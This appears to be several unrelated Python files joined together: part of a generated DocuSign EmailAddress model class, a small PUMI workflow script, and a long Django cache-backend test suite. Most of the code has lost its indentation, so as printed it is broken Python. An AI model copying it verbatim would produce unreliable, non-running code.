def x_position(self):
"""
Gets the x_position of this EmailAddress.
This indicates the horizontal offset of the object on the page. DocuSign uses 72 DPI when determining position.
:return: The x_position of this EmailAddress.
:rtype: str
"""
return self._x_position
@x_position.setter
def x_position(self, x_position):
"""
Sets the x_position of this EmailAddress.
This indicates the horizontal offset of the object on the page. DocuSign uses 72 DPI when determining position.
:param x_position: The x_position of this EmailAddress.
:type: str
"""
self._x_position = x_position
@property
def y_position(self):
"""
Gets the y_position of this EmailAddress.
This indicates the vertical offset of the object on the page. DocuSign uses 72 DPI when determining position.
:return: The y_position of this EmailAddress.
:rtype: str
"""
return self._y_position
@y_position.setter
def y_position(self, y_position):
"""
Sets the y_position of this EmailAddress.
This indicates the vertical offset of the object on the page. DocuSign uses 72 DPI when determining position.
:param y_position: The y_position of this EmailAddress.
:type: str
"""
self._y_position = y_position
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
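# Illustrative usage sketch (not part of the generated client): `swagger_types`
# maps each Python attribute to its type, `attribute_map` maps it to its JSON
# key, and `to_dict()` serializes the model using the Python attribute names.
if __name__ == "__main__":
    tab = EmailAddress(anchor_string="Email:", x_position="100", y_position="200")
    assert tab.to_dict()["anchor_string"] == "Email:"
    assert tab.attribute_map["anchor_string"] == "anchorString"
    print(tab)  # __repr__ pretty-prints all model properties via pformat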
|
from rldqn import DQN, FCNet, RandomLearner
from rlddpg import DDPG
|
#!/usr/bin/env python
import PUMI.utils.Concat as conc
conc = conc.concat_workflow(2)
conc.inputs.inputspec.par1 = "abc"
conc.inputs.inputspec.par2 = "def"
conc.write_graph('graph-orig.dot', graph2use='orig', simple_form=True)
conc.write_graph('graph-exec-detailed.dot', graph2use='exec', simple_form=False)
conc.write_graph('graph.dot', graph2use='colored')
conc.run()
|
# -*- coding: utf-8 -*-
# Most of this file was copied from:
# https://raw.githubusercontent.com/django/django/1.11.12/tests/cache/tests.py
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import io
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
ignore_warnings, mock, override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.deprecation import RemovedInDjango21Warning
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
################################################################################
# Setup Django for models import.
################################################################################
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tests.settings')
############################################################################
# GrantJ 2017-03-27 Ignore deprecation warnings. Django's metaclass magic does
# not always play well with Python 3.6. Read
# http://stackoverflow.com/questions/41343263/ for details
############################################################################
import warnings
warnings.filterwarnings('ignore', category=DeprecationWarning)
import django
django.setup()
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable(object):
def __getstate__(self):
raise pickle.PickleError()
class UnpicklableType(object):
# Unpicklable using the default pickling protocol on Python 2.
__slots__ = 'a',
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
def custom_key_func2(key, key_prefix, version):
"Another customized cache key function"
return '-'.join(['CUSTOM', key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': custom_key_func2},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
    # `params` are test-specific overrides and `_caches_setting_base` is the
    # base config for the tests.
    # This results in the following search order:
    # params -> _caches_setting_base -> base (see the illustrative sketch below).
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base.keys() if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
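def _example_caches_setting_for_tests():
    # Illustrative sketch only (not part of the original test suite): shows the
    # params -> _caches_setting_base -> base merge order documented above. The
    # backend and location values here are hypothetical placeholders.
    example = caches_setting_for_tests(
        base={'BACKEND': 'diskcache.DjangoCache'},
        exclude={'v2'},
        LOCATION='/tmp/diskcache-example',
    )
    # Each remaining alias starts from `base`, gains its per-alias keys from
    # _caches_setting_base, and finally receives the LOCATION override from **params.
    assert example['cull'] == {
        'BACKEND': 'diskcache.DjangoCache',
        'OPTIONS': {'MAX_ENTRIES': 30},
        'LOCATION': '/tmp/diskcache-example',
    }
    assert 'v2' not in example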
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertTrue(cache.touch('expire1', timeout=2))
time.sleep(1)
self.assertTrue(cache.has_key('expire1'))
time.sleep(2)
self.assertFalse(cache.has_key('expire1'))
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertTrue(cache.touch('expire1'))
time.sleep(2)
self.assertTrue(cache.has_key('expire1'))
self.assertFalse(cache.touch('nonexistent'))
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
        Follow memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertIs(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
cache.touch('key5', timeout=None)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
cache.touch('key5', timeout=0)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
cache.set(key, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
self.assertEqual(str(w[0].message.args[0]), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
expected_warning = (
"Cache key contains characters that will cause errors if used "
"with memcached: %r" % key
)
self._perform_invalid_key_test(key, expected_warning)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertEqual(cache.get_or_set('null', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
def test_get_or_set_callable_returning_none(self):
self.assertIsNone(cache.get_or_set('mykey', lambda: None))
# Previous get_or_set() doesn't store None in the cache.
self.assertEqual(cache.get('mykey', 'default'), 'default')
def test_get_or_set_version(self):
cache.get_or_set('brian', 1979, version=2)
with self.assertRaises(TypeError):
cache.get_or_set('brian')
with self.assertRaises(TypeError):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
